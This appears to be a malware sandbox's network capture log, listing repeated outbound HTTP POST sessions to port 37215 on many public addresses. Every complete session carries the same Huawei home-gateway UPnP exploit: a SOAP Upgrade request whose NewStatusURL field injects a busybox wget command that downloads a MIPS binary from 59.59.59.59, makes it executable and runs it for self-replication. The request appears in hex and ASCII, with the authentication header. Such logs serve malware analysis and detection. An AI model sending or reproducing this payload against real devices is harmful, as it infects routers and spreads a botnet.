                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          218192.168.2.154921063.174.254.5337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.556824923 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          219192.168.2.155211441.120.74.11137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.556937933 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          220192.168.2.1551694197.140.110.19937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.556953907 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          221192.168.2.155051041.60.76.16537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.556976080 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          222192.168.2.1549626157.126.127.8837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.557074070 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          223192.168.2.155110041.84.144.13437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.557221889 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          224192.168.2.1541034157.22.251.3037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.557282925 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          225192.168.2.1547820198.102.95.9137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.557307959 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          226192.168.2.1540742218.91.13.22137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.557360888 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          227192.168.2.1548036197.70.142.15737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.557415009 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 